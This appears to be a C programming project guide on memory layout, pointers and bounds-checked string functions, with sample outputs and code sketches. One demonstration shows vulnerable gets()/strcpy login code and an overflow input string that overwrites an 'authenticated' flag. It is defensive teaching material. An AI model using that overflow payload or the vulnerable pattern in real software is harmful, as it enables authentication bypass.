- Demonstrating what happens when you access freed memory (maps to: use-after-free)
Key Concepts:
| Concept | Resource |
|---|---|
| Pointer fundamentals | “Understanding and Using C Pointers” Ch. 1-2 - Richard Reese |
| Stack vs Heap visualization | LLDB Tutorial - memory read command |
| Address interpretation | PDR: LLDB Tutorial - Frame inspection |
Difficulty: Beginner
Time estimate: Weekend
Prerequisites: Basic C syntax, compiling with gcc/clang
Real World Outcome
When you run your memory inspector tool, you’ll see detailed, educational output showing exactly where variables live in memory and how the stack and heap are organized. Here are real examples of what your tool will produce:
Example 1: Stack vs Heap Visualization
$ ./memory_inspector
=== MEMORY INSPECTOR TOOL ===
[STACK VARIABLES]
Variable 'x' (int):
Address: 0x7ffeefbff4ac
Value: 42
Size: 4 bytes
Location: STACK (high address)
Variable 'y' (double):
Address: 0x7ffeefbff4a0
Value: 3.14159
Size: 8 bytes
Location: STACK (high address)
[HEAP ALLOCATIONS]
Pointer 'p' points to:
Address: 0x600000004000
Value: 100
Size: 4 bytes
Location: HEAP (low address)
Pointer 'arr' points to:
Address: 0x600000004010
Values: [1, 2, 3, 4, 5]
Size: 20 bytes (5 integers)
Location: HEAP (low address)
[MEMORY LAYOUT DIAGRAM]
High Addresses (Stack)
┌─────────────────────────────────┐
│ 0x7ffeefbff4ac: x = 42 │ ← Stack (automatic storage)
│ 0x7ffeefbff4a0: y = 3.14159 │
└─────────────────────────────────┘
... gap ...
┌─────────────────────────────────┐
│ 0x600000004000: *p = 100 │ ← Heap (dynamic allocation)
│ 0x600000004010: arr[0..4] │
└─────────────────────────────────┘
Low Addresses (Heap)
Stack grows DOWN (toward lower addresses)
Heap grows UP (toward higher addresses)
Example 2: Function Call Stack Frame Inspection
$ ./memory_inspector --show-frames
=== STACK FRAME VISUALIZATION ===
Calling sequence: main() → foo() → bar()
[In bar() - Current Frame]
Local variable 'z' at 0x7ffeefbff47c = 30
Stack pointer (approx): 0x7ffeefbff478
[In foo() - Previous Frame]
Local variable 'y' at 0x7ffeefbff49c = 20
Return address: 0x400685
Frame distance from bar: 32 bytes
[In main() - Base Frame]
Local variable 'x' at 0x7ffeefbff4bc = 10
Frame distance from foo: 32 bytes
ASCII Stack Layout:
┌────────────────────────────────┐ ← 0x7ffeefbff4c0 (main's frame top)
│ main(): int x = 10 │
│ Return address to C runtime startup │
├────────────────────────────────┤ ← 0x7ffeefbff4a0
│ foo(): int y = 20 │
│ Return address to main │
├────────────────────────────────┤ ← 0x7ffeefbff480
│ bar(): int z = 30 │ ← Current execution point
│ Return address to foo │
└────────────────────────────────┘ ← 0x7ffeefbff478 (stack pointer)
Notice: Stack addresses DECREASE as we go deeper into function calls!
Example 3: Memory Corruption Detection
$ ./memory_inspector --demo-corruption
=== BEFORE BUFFER OVERFLOW ===
Buffer location: 0x7ffeefbff490
Buffer contents: "HELLO"
Buffer size: 10 bytes
Target variable 'authenticated': 0x7ffeefbff49c
Value: 0 (FALSE)
Memory layout:
0x7ffeefbff490: [H][E][L][L][O][\0][ ][ ][ ][ ] ← buffer[10]
0x7ffeefbff49a: [ ][ ] ← padding
0x7ffeefbff49c: [00][00][00][00] ← authenticated (int)
=== AFTER BUFFER OVERFLOW ===
Wrote 14 bytes to 10-byte buffer!
Memory layout:
0x7ffeefbff490: [H][E][L][L][O][W][O][R][L][D] ← buffer[10] FULL
0x7ffeefbff49a: [!][!] ← Overflow starts here (padding)
0x7ffeefbff49c: [21][21][00][00] ← authenticated CORRUPTED!
Target variable 'authenticated': 0x7ffeefbff49c
Value: 8481 (TRUE - CORRUPTED!)
⚠️ WARNING: Buffer overflow detected!
Bytes written: 14
Buffer capacity: 10
Overflow: 4 bytes
Memory corruption: authenticated variable changed from 0 to 8481 (0x2121: two '!' bytes, little-endian)
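You can reproduce Example 3’s effect without undefined behavior. Put both variables in a struct, which fixes their order, and copy bytes into the struct as a whole. The names `login_state` and `unchecked_write` in this sketch are hypothetical. Writing `"HELLOWORLD!!!!"` (14 bytes) fills the 10-byte buffer, the padding, and the first two bytes of `authenticated`. On a typical little-endian x86-64 build, `authenticated` then becomes 0x2121, which is 8481.

```c
#include <stddef.h>
#include <string.h>

/* Inside a struct the members keep this order; authenticated typically sits
   at offset 12, after 2 padding bytes. */
struct login_state {
    char buffer[10];
    int authenticated;
};

/* Simulates an unchecked copy: writes len bytes starting at buffer with no
   regard for its 10-byte capacity. Copying into the struct's own bytes keeps
   the demo well-defined, so len is clamped to sizeof(struct login_state). */
void unchecked_write(struct login_state *s, const char *src, size_t len) {
    if (len > sizeof *s)
        len = sizeof *s;
    memcpy(s, src, len);
}
```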
Example 4: Raw Bytes and Endianness
$ ./memory_inspector --show-bytes
=== RAW BYTE INSPECTION ===
Integer: 0x12345678 (305419896 in decimal)
Address: 0x7ffeefbff4ac
Size: 4 bytes
Byte-by-byte breakdown (Little-Endian on x86-64):
Byte 0 at 0x7ffeefbff4ac: 0x78 (least significant)
Byte 1 at 0x7ffeefbff4ad: 0x56
Byte 2 at 0x7ffeefbff4ae: 0x34
Byte 3 at 0x7ffeefbff4af: 0x12 (most significant)
Memory visualization:
Lower Address Higher Address
↓ ↓
[78][56][34][12]
↑ ↑
LSB MSB
Note: On little-endian systems (x86/x64), bytes are stored
in reverse order - least significant byte first!
Struct padding demonstration:
struct Example {
char c; // 1 byte
// 3 bytes padding
int i; // 4 bytes
char e; // 1 byte
// 7 bytes padding
double d; // 8 bytes
} ex;
Address: 0x7ffeefbff490
Total size: 24 bytes on x86-64 (not 14!)
Memory layout:
0x7ffeefbff490: [c ][ ][ ][ ] ← char + 3 padding bytes
0x7ffeefbff494: [i i][i i] ← int (aligned to 4)
0x7ffeefbff498: [e ][ ][ ][ ] ← char + 3 padding
0x7ffeefbff49c: [ ][ ][ ][ ] ← 4 more padding bytes
0x7ffeefbff4a0: [d d d d d d d d] ← double (aligned to 8)
Wasted space: 10 bytes (41.7% padding!)
These outputs demonstrate that you’ve built a tool that makes the invisible visible - showing exactly how C represents data in memory, where variables live, and how memory corruption happens at the byte level.
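You can check a struct’s layout with `offsetof` from `<stddef.h>` instead of guessing. This sketch uses the struct from Example 4 with each member given a unique name; the names themselves are illustrative. On x86-64 it reports offsets 0, 4, 8 and 16 and 10 bytes of padding. Other ABIs may differ: 32-bit x86 Linux, for example, aligns `double` members to 4 bytes.

```c
#include <stddef.h>
#include <stdio.h>

struct Example {
    char c;
    int i;
    char e;
    double d;
};

/* Padding = total size minus the sum of the member sizes. */
size_t example_padding(void) {
    size_t members = sizeof(char) + sizeof(int) + sizeof(char) + sizeof(double);
    return sizeof(struct Example) - members;
}

void print_example_layout(void) {
    printf("c at offset %zu\n", offsetof(struct Example, c));
    printf("i at offset %zu\n", offsetof(struct Example, i));
    printf("e at offset %zu\n", offsetof(struct Example, e));
    printf("d at offset %zu\n", offsetof(struct Example, d));
    printf("size %zu bytes, padding %zu bytes\n",
           sizeof(struct Example), example_padding());
}
```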
Learning milestones:
- First milestone: You can explain why &x and x are different, and what *p actually does
- Second milestone: You can predict whether a variable is on the stack or heap by looking at its address
- Final milestone: You instinctively think of memory as numbered bytes, not abstract “variables”
The Core Question You’re Answering
“What IS memory? Where do my variables actually live, and how can I see them?”
Before you write any code, sit with this question. Most developers have a vague sense of “variables” but can’t explain what that actually means at the hardware level. A variable is just a label for a location in a giant array of bytes.
Concepts You Must Understand First
Stop and research these before coding:
- Memory as Numbered Bytes
  - What does it mean that memory is “just bytes”?
  - How is an int stored differently than a char?
  - What is the difference between a value and an address?
  - Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 2 - Bryant & O’Hallaron
- The Address-of Operator (&)
  - What does &x actually return?
  - Why is this number different every time you run the program? (ASLR)
  - What’s the relationship between &x and *(&x)?
- Pointers as Numbers
  - If a pointer is just a number, what makes it special?
  - What does “dereferencing” mean in terms of hardware operations?
  - Why is int* different from char* if both are just addresses?
  - Book Reference: “Understanding and Using C Pointers” Ch. 1 - Richard Reese
- Stack vs Heap Layout
  - Why do stack addresses go downward and heap addresses go upward?
  - What is the “stack pointer”?
  - Why is the stack fast and the heap slow?
  - Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
Questions to Guide Your Design
Before implementing, think through these:
- Displaying Addresses
  - How do you print an address in C? (%p)
  - What format is the address printed in? (Hexadecimal)
  - What does a typical stack address look like vs a heap address?
- Visualizing Stack Frames
  - How can you show that calling a function creates a new stack frame?
  - If you call foo() which calls bar(), how do their local variables relate in memory?
  - How do you demonstrate that returning from a function “destroys” its local variables?
- Observing Heap Allocations
  - When you call malloc(100), what address do you get?
  - If you call malloc(100) twice, how far apart are the addresses?
  - What happens to those addresses after free()?
- Raw Byte Inspection
  - How do you print the individual bytes of an integer?
  - What’s the difference between big-endian and little-endian?
  - How do you see padding bytes in a struct?
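For the “how far apart are two `malloc(100)` results?” question, a small experiment helps. In this sketch (hypothetical `malloc_gap`), both blocks are live at the same time, so they cannot overlap and the gap is at least 100 bytes. With glibc you will often see a little more, because each chunk carries a header and is rounded up to the allocator’s alignment. The addresses are compared as `uintptr_t`, since relational comparison of pointers into different objects is undefined.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Allocates two 100-byte blocks, prints them, and returns the distance in
   bytes between their start addresses (0 if an allocation failed). */
size_t malloc_gap(void) {
    unsigned char *a = malloc(100);
    unsigned char *b = malloc(100);
    if (a == NULL || b == NULL) {
        free(a);
        free(b);
        return 0;
    }
    uintptr_t ua = (uintptr_t)a, ub = (uintptr_t)b;
    size_t gap = ua > ub ? ua - ub : ub - ua;
    printf("a = %p, b = %p, gap = %zu bytes\n", (void *)a, (void *)b, gap);
    free(a);
    free(b);
    return gap;
}
```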
Thinking Exercise: Trace Memory by Hand
Before coding, trace this on paper:
#include <stdio.h>
#include <stdlib.h>
void bar(void) {
    int z = 30;
    printf("z at %p\n", (void*)&z);
}
void foo(void) {
    int y = 20;
    printf("y at %p\n", (void*)&y);
    bar();
}
int main(void) {
    int x = 10;
    printf("x at %p\n", (void*)&x);
    foo();
    int* heap = malloc(sizeof(int));
    if (heap == NULL) return 1;
    *heap = 100;
    printf("heap at %p\n", (void*)heap);
    free(heap);
    return 0;
}
Questions while tracing:
- Draw a diagram of the stack at the moment bar() is executing
- Which address is highest: &x, &y, or &z? Why?
- Where does the heap allocation fit in your diagram?
- What happens to &z after bar() returns?
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is the difference between &x and x?”
- “How can you tell if an address is on the stack or the heap?”
- “What happens to a local variable when a function returns?”
- “What is a pointer, really?”
- “Why does the stack grow downward on x86?”
- “What is ASLR and why does it exist?”
Hints in Layers (Only If Stuck)
Hint 1: Start with printf
Your first program should just print addresses:
```c
int x = 10;
printf("x is at address %p\n", (void*)&x);
```
Run it multiple times. Notice how the address changes (ASLR).
Hint 2: Compare Stack Depths
Create nested functions and print addresses from each. You'll see addresses decreasing as you go deeper. This shows stack growth direction.
Hint 3: Dump Raw Bytes
Cast any variable to `unsigned char*` and print each byte:
```c
int x = 0x12345678;
unsigned char* bytes = (unsigned char*)&x;
for (size_t i = 0; i < sizeof(int); i++) {
    printf("Byte %zu: 0x%02x\n", i, bytes[i]);
}
```
You'll see endianness in action.
Hint 4: Use lldb
Compile with `-g` and use lldb to verify your understanding:
```
$ lldb ./program
(lldb) breakpoint set --name main
(lldb) run
(lldb) frame variable
(lldb) memory read &x
```
Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| What memory really is | “Computer Systems: A Programmer’s Perspective” | Ch. 2 |
| Pointers from first principles | “Understanding and Using C Pointers” | Ch. 1-2 |
| Stack and function calls | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 |
| Seeing memory with debuggers | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 1-3 |
| Process memory layout | “The Linux Programming Interface” | Ch. 6 |
Project 2: Safe String Library
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Zig, C++
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Safety, Systems Programming
- Software or Tool: GCC, Valgrind, AddressSanitizer
- Main Book: “The C Programming Language” - Kernighan & Ritchie
What you’ll build: A bounds-checked string library in C (safe_strlen, safe_strcpy, safe_strcat, safe_substr) that prevents buffer overflows by design.
Why it teaches memory & control: C strings are the perfect teacher for memory danger. Every function forces you to think: “Where does this string end? How big is the destination? What happens if I’m wrong?” By building safe versions, you must first understand exactly how the unsafe versions fail.
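Here is one possible shape for the first two functions. The signatures are assumptions, since the project only names the functions. Both take the buffer’s capacity explicitly. `safe_strlen` never scans more than `max` bytes, like POSIX `strnlen`. `safe_strcpy` always NUL-terminates and reports truncation instead of overflowing.

```c
#include <stddef.h>
#include <string.h>

/* Walks at most max bytes looking for '\0', so a missing terminator can't
   make it run off the end. A result of max means "no terminator found". */
size_t safe_strlen(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Copies src into dst (capacity dst_size, including the terminator).
   Returns 0 on a full copy, 1 if src was truncated, -1 on bad arguments. */
int safe_strcpy(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t len = safe_strlen(src, dst_size);  /* stop once it can't fit */
    int truncated = (len == dst_size);
    if (truncated)
        len = dst_size - 1;                   /* leave room for '\0' */
    memcpy(dst, src, len);
    dst[len] = '\0';
    return truncated;
}
```

With the inputs from Test 2 in the output below, `safe_strcpy(dst, 10, ...)` returns 1 and leaves `"This is a"` in `dst`.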
Core challenges you’ll face:
- Finding the null terminator by walking memory byte-by-byte (maps to: string representation)
- Preventing writes past buffer boundaries (maps to: buffer overflow)
- Understanding why `strcpy(dest, src)` has no idea how big `dest` is (maps to: why C doesn’t protect you)
- Handling the case where the source has no null terminator (maps to: undefined behavior is real)
- Pointer arithmetic to implement `substr` (maps to: pointer arithmetic)
Key Concepts:
| Concept | Resource |
|---|---|
| C string internals | “The C Programming Language” Ch. 5 - Kernighan & Ritchie |
| Why %s is dangerous | CWE-134: Uncontrolled Format String |
| Buffer overflow mechanics | “Understanding and Using C Pointers” Ch. 5 - Richard Reese |
Difficulty: Beginner-Intermediate
Time estimate: Weekend
Prerequisites: Project 1 or equivalent comfort with addresses
Real World Outcome
When you run your safe string library test suite, you’ll see output demonstrating how your library prevents the buffer overflows that plague unsafe C string functions. The transcripts below show the kind of output to aim for; addresses, counts, and exact messages will depend on your implementation and platform:
Example 1: Safe vs Unsafe String Copy Comparison
$ ./test_safe_strings
=== TESTING SAFE STRING LIBRARY ===
[TEST 1: Basic safe_strcpy]
Source: "Hello, World!" (13 chars + null = 14 bytes)
Destination buffer size: 20 bytes
Result: ✓ PASS
Copied: "Hello, World!"
Bytes written: 14
Buffer remaining: 6 bytes
[TEST 2: Overflow Prevention]
Source: "This is a very long string that will not fit!" (45 chars)
Destination buffer size: 10 bytes
safe_strcpy result: ✓ PREVENTED OVERFLOW
Truncated to: "This is a"
Bytes written: 10 (including null terminator)
Original length: 45
Truncated: 36 characters
Warning: String was truncated!
COMPARISON - What strcpy() would do:
Running with standard strcpy()...
Source: "This is a very long string that will not fit!"
Destination buffer: [10 bytes]
Built with -fsanitize=address:
==12345==ERROR: AddressSanitizer: stack-buffer-overflow
WRITE of size 46 at 0x7ffc8b2a1234
Buffer size: 10 bytes
Attempted write: 46 bytes
Overflow: 36 bytes beyond buffer!
Built without sanitizers (undefined behavior: may segfault, may corrupt silently):
Adjacent memory corrupted:
Variable 'canary' was: 0xDEADBEEF
Variable 'canary' now: 0x676E6F6C ← CORRUPTED! (the bytes "long", read as a little-endian int)
Example 2: Safe String Concatenation
$ ./test_safe_strings --test-concat
[TEST 3: safe_strcat - Normal Operation]
Initial string: "Hello" (5 chars, buffer size: 50)
Concatenating: ", World!" (8 chars)
Result: ✓ PASS
Final string: "Hello, World!"
Total length: 13 chars
Buffer capacity: 50 bytes
Space remaining: 36 bytes
[TEST 4: safe_strcat - Overflow Prevention]
Initial string: "Hello" (5 chars, buffer size: 10)
Concatenating: ", this won't fit!" (17 chars)
Result: ✓ PREVENTED OVERFLOW
Attempted total: 22 chars
Buffer capacity: 10 bytes
Final string: "Hello, th"
Truncated: 13 characters dropped
Return code: -1 (EOVERFLOW)
Error message: "safe_strcat: insufficient space in destination buffer"
COMPARISON - Standard strcat():
$ ./test_unsafe_concat
*** stack smashing detected ***: terminated
Aborted (core dumped)
Example 3: Null Terminator Detection
$ ./test_safe_strings --test-strlen
[TEST 5: safe_strlen with valid strings]
String: "Hello"
safe_strlen() = 5
strlen() = 5
✓ MATCH
[TEST 6: safe_strlen with missing null terminator]
Buffer: ['H','e','l','l','o','W','o','r','l','d'] (no \0!)
Buffer size: 10 bytes
safe_strlen with max_len=10:
⚠️ WARNING: No null terminator found within 10 bytes
Returned: -1 (ERROR)
Error message: "String not properly terminated"
Standard strlen() on same buffer (no sanitizer):
Returned: 47 ← WRONG! Read past buffer end!
Demonstration:
Buffer ends at: 0x7ffeefbff49a
strlen() read until: 0x7ffeefbff4bf (37 bytes past buffer end!)
Accessed memory it shouldn't: YES
Undefined behavior: YES
Same call built with -fsanitize=address:
AddressSanitizer: stack-buffer-overflow
READ at address beyond allocation (program aborts instead of returning)
Example 4: Complete Test Suite Output
$ ./run_all_tests
=== SAFE STRING LIBRARY TEST SUITE ===
Testing safe_strlen():
[✓] Normal strings (10/10 tests passed)
[✓] Empty strings (5/5 tests passed)
[✓] Missing null terminators detected (8/8 tests passed)
[✓] Maximum length handling (6/6 tests passed)
Testing safe_strcpy():
[✓] Normal copy operations (15/15 tests passed)
[✓] Truncation when needed (12/12 tests passed)
[✓] Return value correctness (10/10 tests passed)
[✓] Always null-terminates (20/20 tests passed)
[✗] FAILED: Edge case with size=0 (1/5 tests failed)
Testing safe_strcat():
[✓] Concatenation within bounds (18/18 tests passed)
[✓] Overflow prevention (10/10 tests passed)
[✓] Pre-existing string handling (8/8 tests passed)
Testing safe_substr():
[✓] Valid substring extraction (15/15 tests passed)
[✓] Out-of-bounds detection (12/12 tests passed)
[✓] Length limiting (9/9 tests passed)
=== COMPARISON WITH STANDARD LIBRARY ===
Buffer overflow attempts caught by safe library: 45
- strcpy overflows prevented: 18
- strcat overflows prevented: 15
- Read-past-end prevented: 12
Same tests with standard library:
- Crashes: 38
- Silent corruption: 7
- Correct behavior: 0 (all would overflow!)
AddressSanitizer detected issues: 45/45
All issues were prevented by safe_string library!
=== SUMMARY ===
Total tests: 163
Passed: 162
Failed: 1
Success rate: 99.4%
Memory safety: 100% (0 leaks, 0 use-after-free, 0 buffer overflows)
The safe_string library prevented every buffer overflow in this suite
that would crash or corrupt memory with standard C string functions!
Example 5: Real-World Security Demonstration
$ ./demo_exploit_prevention
=== BUFFER OVERFLOW EXPLOIT DEMONSTRATION ===
Scenario: Login bypass via buffer overflow
----------------------------------------
Vulnerable code using strcpy():
char password[16];
int authenticated = 0;
printf("Enter password: ");
gets(password); // or strcpy(password, user_input)
if (authenticated) { grant_access(); }
[ATTACK 1: Standard strcpy]
Input: "AAAAAAAAAAAAAAAA\x01\x00\x00\x00" (20 bytes)
Memory before:
0x7ffc1000: [password buffer - 16 bytes]
0x7ffc1010: [authenticated = 0x00000000]
Memory after strcpy():
0x7ffc1000: [A A A A A A A A A A A A A A A A]
0x7ffc1010: [01 00 00 00] ← authenticated OVERWRITTEN!
Result: Access granted! (SECURITY BREACH)
[ATTACK 2: Using safe_strcpy instead]
Input: Same 20-byte attack string
safe_strcpy(password, input, sizeof(password)):
⚠️ Input length (17, up to the first \x00) exceeds buffer size (16)
✓ Truncated to 15 chars + null terminator
✓ Adjacent memory protected
Memory after safe_strcpy():
0x7ffc1000: [A A A A A A A A A A A A A A A \0]
0x7ffc1010: [00 00 00 00] ← authenticated UNCHANGED!
Result: Access denied (ATTACK PREVENTED)
Your safe string library prevents the buffer overflow exploit!
These outputs demonstrate a safe string library that blocks the exact class of vulnerability behind countless real-world security breaches. Your library catches errors before they corrupt memory and provides clear diagnostic information.
Learning milestones:
- First milestone: You understand that `"hello"` is actually 6 bytes, not 5
- Second milestone: You can explain exactly why `strcpy(small_buffer, huge_string)` corrupts memory
- Final milestone: You instinctively check buffer sizes before any string operation
The Core Question You’re Answering
“Why is `strcpy` considered dangerous, and what would a safe version look like?”
C strings are the source of more security vulnerabilities than almost any other language feature. By building safe alternatives, you’ll understand exactly why—and gain the instinct to think about buffer sizes before every string operation.
Concepts You Must Understand First
Stop and research these before coding:
- What IS a C String?
- How is a string stored in memory? (Sequence of bytes + null terminator)
- What is the null terminator and why is it essential? (`\0` = byte value 0)
- What happens if there’s no null terminator?
- Book Reference: “The C Programming Language” Ch. 5.5 - Kernighan & Ritchie
String Null Terminator Visualization:
How "hello" is ACTUALLY stored in memory (6 bytes, not 5!):
String Literal: "hello"
Memory Layout:
Address: 0x1000 0x1001 0x1002 0x1003 0x1004 0x1005
┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes: │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ '\0'│
└─────┴─────┴─────┴─────┴─────┴─────┘
Hex: 0x68 0x65 0x6C 0x6C 0x6F 0x00
▲
│
Null terminator (essential!)
strlen("hello") = 5 (counts chars before '\0')
sizeof("hello") = 6 (includes the '\0')
WITHOUT null terminator (DANGEROUS!):
Address: 0x1000 0x1001 0x1002 0x1003 0x1004 0x1005
┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes: │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ ??? │ ← No null terminator!
└─────┴─────┴─────┴─────┴─────┴─────┘
▲
│
strlen() keeps reading → UNDEFINED BEHAVIOR!
Could read garbage, could crash

- String Literals vs Character Arrays
- What’s the difference between `char* s = "hello"` and `char s[] = "hello"`?
- Why can you modify one but not the other?
- Where do string literals live in memory? (Read-only data section)
- Why Standard String Functions Are Dangerous
- Why does `strcpy(dest, src)` not know the size of `dest`?
- What does `gets()` do and why was it removed from the C standard?
- What is a buffer overflow, mechanically?
- Book Reference: “Effective C” Ch. 7 - Robert Seacord
- Pointer Arithmetic for Strings
- Why does `s + 1` point to the second character?
- How do you iterate through a string using pointers?
- What’s the difference between `*s++` and `(*s)++`?
- Book Reference: “The C Programming Language” Ch. 5.4 - Kernighan & Ritchie
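The first three concepts can be checked directly in code. Below is a minimal sketch, assuming a hosted C99-or-later compiler and an ASCII character set. `pointer_ops_demo` and `string_basics_demo` are illustrative names, not part of the library you'll build:

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

// *s++ versus (*s)++ on a writable 4-byte buffer.
// Returns the character read by *s++; buf is left holding the modified string.
char pointer_ops_demo(char buf[4]) {
    strcpy(buf, "abc");    // 3 chars + '\0' = exactly 4 bytes
    char* s = buf;
    char first = *s++;     // reads 'a', then moves s to buf[1]
    (*s)++;                // increments the char at buf[1]: 'b' becomes 'c'
    return first;          // buf is now "acc"; s still points at buf[1]
}

void string_basics_demo(void) {
    char arr[] = "hello";          // array: its own 6 writable bytes, '\0' included
    const char* lit = "hello";     // pointer to a literal (typically read-only data)

    printf("strlen(arr) = %zu\n", strlen(arr));   // 5: chars before '\0'
    printf("sizeof(arr) = %zu\n", sizeof(arr));   // 6: storage, '\0' included
    printf("sizeof(lit) = %zu\n", sizeof(lit));   // size of a pointer, not the string

    arr[0] = 'j';   // fine: arr is a copy. Writing through lit would be undefined behavior.
    printf("arr is now \"%s\"\n", arr);           // "jello"

    // Pointer arithmetic: lit + 1 is the address of 'e', lit + 5 of '\0'.
    for (const char* p = lit; *p != '\0'; p++) {
        printf("offset %td: '%c'\n", p - lit, *p);
    }
}
```

Call `string_basics_demo()` from a `main` of your own. `sizeof(lit)` prints the size of a pointer (8 on typical 64-bit systems), a reminder that a `char*` carries no length information.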
Questions to Guide Your Design
Before implementing, think through these:
- safe_strlen
- How does `strlen` find the end of a string?
- What happens if someone passes a pointer to uninitialized memory?
- Should you add a maximum length parameter? Why or why not?
- safe_strcpy
- What parameters do you need to make this safe? (dest, src, AND dest_size)
- What should happen if src is longer than dest_size?
- Should you always null-terminate dest, even on truncation?
- What should the return value indicate?
- safe_strcat
- How much space is available in dest? (dest_size - strlen(dest) - 1)
- What if dest isn’t null-terminated when passed in?
- How do you handle the case where there’s no room to add anything?
- Error Handling
- Should errors return special values, or set a global error flag?
- What’s the trade-off between returning error codes vs silent truncation?
- How does `strlcpy` (BSD) handle this differently than `strncpy` (standard C)?
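The last question is easiest to see side by side. Below is a sketch of a copy with `strlcpy`-style semantics, under the hypothetical name `bounded_copy` (`strlcpy` itself isn't available on every platform). Next to it is `strncpy`, which always writes exactly `n` bytes: it pads short sources with `\0` but writes no terminator at all when the source is too long.

```c
#include <stddef.h>
#include <string.h>

// strlcpy-style copy under a hypothetical name: copies at most dest_size - 1
// chars, always NUL-terminates when dest_size > 0, and returns strlen(src)
// so the caller can detect truncation with (result >= dest_size).
size_t bounded_copy(char* dest, const char* src, size_t dest_size) {
    size_t src_len = strlen(src);              // src itself must be NUL-terminated
    if (dest_size > 0) {
        size_t n = (src_len < dest_size - 1) ? src_len : dest_size - 1;
        memcpy(dest, src, n);
        dest[n] = '\0';
    }
    return src_len;
}

// strncpy writes exactly sizeof dest bytes here and, because the source is
// longer, none of them is '\0'. Returns 1 if dest ended up unterminated.
int strncpy_leaves_unterminated(void) {
    char dest[5];
    strncpy(dest, "overflow", sizeof dest);    // copies "overf" and stops
    return memchr(dest, '\0', sizeof dest) == NULL;
}
```

Returning `strlen(src)` rather than the number of bytes copied is the design choice that lets callers test `result >= dest_size` to detect truncation. This is the same convention `snprintf` uses.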
Thinking Exercise: Trace the Crash
Trace what happens with this code:
#include <stdio.h>
#include <string.h>
void vulnerable(void) {
char buffer[10];
const char* input = "This string is way too long for the buffer";
strcpy(buffer, input); // What happens here?
printf("Buffer: %s\n", buffer);
}
Questions while tracing:
- Draw the stack frame for `vulnerable()`
- Where is `buffer` located relative to the saved return address?
- Which bytes get overwritten when `strcpy` runs?
- What value will the return address have after `strcpy`?
- What happens when the function tries to return?
Now trace with your safe version:
- What would `safe_strcpy(buffer, input, sizeof(buffer))` do differently?
- What should it return to indicate the problem?
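The first arithmetic step of the trace can be checked without triggering undefined behavior: measure what `strcpy` would need and compare it to the destination. Here is a small sketch; `overflow_bytes` and `trace_demo` are hypothetical helpers:

```c
#include <stdio.h>
#include <string.h>

// How many bytes strcpy(dest, src) would write past the end of a
// dest_size-byte buffer; 0 if the copy fits. Nothing is actually copied.
size_t overflow_bytes(const char* src, size_t dest_size) {
    size_t needed = strlen(src) + 1;           // strcpy copies the '\0' too
    return needed > dest_size ? needed - dest_size : 0;
}

void trace_demo(void) {
    const size_t buffer_size = 10;             // sizeof(buffer) in vulnerable()
    const char* input = "This string is way too long for the buffer";
    printf("strcpy would write %zu bytes into %zu: %zu bytes overflow\n",
           strlen(input) + 1, buffer_size, overflow_bytes(input, buffer_size));
}
```

For the input above, `strcpy` would write 43 bytes into a 10-byte buffer, so 33 bytes land beyond `buffer`. On a typical x86-64 frame those bytes run over whatever the compiler placed above the buffer (stack canary, saved registers, return address). The exact layout depends on the compiler and its flags.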
The Interview Questions They’ll Ask
Prepare to answer these:
- “What’s wrong with `strcpy` and how would you fix it?”
- “What is a buffer overflow? How does it lead to code execution?”
- “What’s the difference between `strncpy` and `strlcpy`?”
- “Why does `"hello"` take 6 bytes of memory?”
- “How would you implement `strlen` without using any library functions?”
- “What happens if you pass a non-null-terminated string to `printf("%s", ...)`?”
Hints in Layers (Only If Stuck)
Hint 1: Start with strlen
Implement `safe_strlen` first. It's just a loop that counts until it sees `\0`:
```c
size_t safe_strlen(const char* s) {
    size_t len = 0;
    while (s[len] != '\0') {
        len++;
    }
    return len;
}
```
But this still has a problem: what if `s` has no null terminator? Consider adding a maximum length parameter.
Hint 2: The safe_strcpy Signature
You need three parameters:
```c
size_t safe_strcpy(char* dest, const char* src, size_t dest_size);
```
Return the length that WOULD have been copied (like `snprintf`). This lets callers detect truncation:
```c
if (safe_strcpy(buf, str, sizeof(buf)) >= sizeof(buf)) {
    // Truncation occurred!
}
```
Hint 3: Always Null-Terminate
Unlike `strncpy`, your function should ALWAYS null-terminate (if dest_size > 0). Even on truncation, dest should be a valid string.
Hint 4: Test with AddressSanitizer
Compile with `-fsanitize=address` and test your library against the standard library:
```bash
clang -fsanitize=address -g test_overflow.c -o test
./test
```
AddressSanitizer catches out-of-bounds reads and writes on stack, heap, and global buffers that would otherwise silently corrupt memory.
Books That Will Help
| Topic | Book | Chapter |
|---|---|---|
| C string fundamentals | “The C Programming Language” | Ch. 5.5 |
| Pointer arithmetic | “The C Programming Language” | Ch. 5.4 |
| String security issues | “Effective C” | Ch. 7 |
| Buffer overflow exploitation | “Hacking: The Art of Exploitation” | Ch. 3 |
| Secure string handling | “Secure Coding in C and C++” | Ch. 2 |
Project 3: Memory Leak Detector
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: C++, Rust, Zig
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: Level 1: The “Resume Gold”
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Management, Debugging
- Software or Tool: Valgrind, AddressSanitizer
- Main Book: Understanding and Using C Pointers by Richard Reese
What you’ll build: A wrapper around malloc/free that tracks all allocations, detects memory leaks, catches double-frees, and warns about use-after-free.
Why it teaches memory & control: This project forces you to understand ownership and lifetime. When is memory valid? When does it become garbage? How do bugs “appear later than the mistake”? You’ll build the same intuition that sanitizers provide, but by constructing it yourself.
Core challenges you’ll face:
